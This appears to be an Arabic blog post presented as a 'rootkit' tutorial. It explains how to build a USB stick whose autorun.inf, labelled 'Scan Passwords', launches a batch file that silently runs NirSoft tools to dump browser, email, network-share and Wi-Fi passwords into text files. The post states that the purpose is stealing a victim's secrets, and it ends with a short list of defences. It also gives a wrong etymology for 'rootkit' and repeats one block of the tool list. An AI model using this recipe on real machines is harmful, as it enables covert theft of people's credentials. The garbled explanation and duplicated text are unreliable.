نبدأ أولا بتعريف معنى الكلمة، تتكون من كلمتين إتنتين. kit, و root، فالأولى تعني مدير الشبكة، أما التانية، فتعني برنامج أو مجموعة برامج. و تنبني الفكرة على إستغلال صلاحيات صاحب الجهاز أو مدير الشبكة في سرقة أو تعديل الإعدادت أو تسطيب فيروسات ، وذلك عبر تسطيب برامج مختصة في كل عملية .
عمليا:
هناك العديد من الأفكار في إستعمال هاته الطريقة، في هاته التدوينة سنناقش كيفية إستعمال الفلاشة في في سرقة معلومات سرية تخص الجهاز و الشبكة، ككلمات السر للمستخدم، كلمة السر للبريد الإلكتروني، كلمات السر في المتصفح ، وأيضا كلمة السر للشبكات اللا سلكية.تطبيق:
كأول مرحلة، سنقوم بإنشاء ملف بإسم autorun.inf، والذي يحتوي على معلومات التالية:
# vi autorun.inf
[autorun]
open = launch.bat
ACTION = Scanner les Passwords
كمرحلة تانية، سنقوم بتحميل مجموعة من البرامج البسيطة من الموقع nirsoft.net و التي تقوم على سرقة المعلومات من الجهاز ( يمكن لبرامج الحماية أن تقوم بعملية الإنظار، فلك أن تجرب).
برنامج ChromePass لسرقة معلومات من المتصفح Google .Chrome
الرابط : http://www.nirsoft.net/utils/chromepass.html
برنامج IE PassView لسرقة معلومات من المتصفح Internet Explore
الرابط : http://www.nirsoft.net/utils/internet_explorer_password.html
برنامج PasswordFox لسرقة معلومات من المتصفح من اسماء المستخدمين و كلمات السر .
الرابط : http://www.nirsoft.net/utils/passwordfox.html
برنامج Mail PassView لسرقة معلومات من برامج البريد الكتروني المعروفة نذكر منها IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, hotmail, yahoo, msn,gmail. Microsoft Outlook 2002/2003...
الرابط : .http://www.nirsoft.net/utils/mailpv.html
برنامج Network Password Recovery عندما يقوم المستخدم بالدخول إلى ملف على الشبكة، يقوم بادخال معلومات كالإسم و كلمة السر، هذا البرنامج يقوم بالتعرف على المعلومات الخاصة بالمستخدم المتصل بالشبكة.
الرابط :http://www.nirsoft.net/utils/network_password_recovery.html
الرابط : http://www.nirsoft.net/utils/chromepass.html
برنامج IE PassView لسرقة معلومات من المتصفح Internet Explore
الرابط : http://www.nirsoft.net/utils/internet_explorer_password.html
برنامج PasswordFox لسرقة معلومات من المتصفح من اسماء المستخدمين و كلمات السر .
الرابط : http://www.nirsoft.net/utils/passwordfox.html
برنامج Mail PassView لسرقة معلومات من برامج البريد الكتروني المعروفة نذكر منها IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, hotmail, yahoo, msn,gmail. Microsoft Outlook 2002/2003...
الرابط : .http://www.nirsoft.net/utils/mailpv.html
برنامج Network Password Recovery عندما يقوم المستخدم بالدخول إلى ملف على الشبكة، يقوم بادخال معلومات كالإسم و كلمة السر، هذا البرنامج يقوم بالتعرف على المعلومات الخاصة بالمستخدم المتصل بالشبكة.
الرابط :http://www.nirsoft.net/utils/network_password_recovery.html
برنامج WirelessKeyView : يقوم بالتعرف على جميع كلمات السر التي يدخلها المستخدم للإتصال بالشبكات اللا سلكية.
بعد أن قمنا بتحميل جميع البرامج ، سوف نقوم بتحضير الفلاشة () لذى وجب مسح جميع الملفات ولم لا القيام بعملية الفرمطة.
1ـ تحويل جميع الملفات بصيغهexe. إلى الفلاشة.
2-2ـ نقوم بكتابة "نص" يحتوي على المعلومات التالية:
# vi autorun.inf
[autorun]
open = launch.bat
ACTION = Scan Passwords
يحتوي الملف على أمر، بحيت أن أول أمر سيقوم به النظام هو تشغيل ملف launch.bat.
2ـ إنشاء ملف باسم launch.bat يحتوي على المعلومات التالية:
# vi launch.bat
@echo off
start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext iepv.txt
start mailpv.exe /stext mailpv.txt
start netpass.exe /stext netpass.txt
start PasswordFox.exe /stext PasswordFox.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
نكون قد إنتهينا من إعداد الفلاشة، ولم يبقى سوى تركيبها على الجهاز.
يجب على الجهاز أن يسمح بتسطيب ملفات ال بطريقة أوتوماتيكية.
بعد تركيب الفلاشة، يقوم الجهاز بتسطيب البرامج، و تخزن المعلومات في ملف نصي ، حيت يحتوي على جميع المعلومات المسروقة.
الحلول المقترحة:
كمدير الشبكة، لابد من من إيجاد حل لهاته المشكلة الأمنية قبل حدوتها، نقترح منها:
1ـ تعطيل مداخيل الUSB.
2ـ إستعمال برامج الحماية ضد أعمال الrootkit.
3ـ عدم السماح للاجهزة بتسطيب ملفات autorun.inf.
4ـ عدم السماح للمستخدمين بتسطيب البرامج على الأجهزة.
...
ليست هناك تعليقات:
إرسال تعليق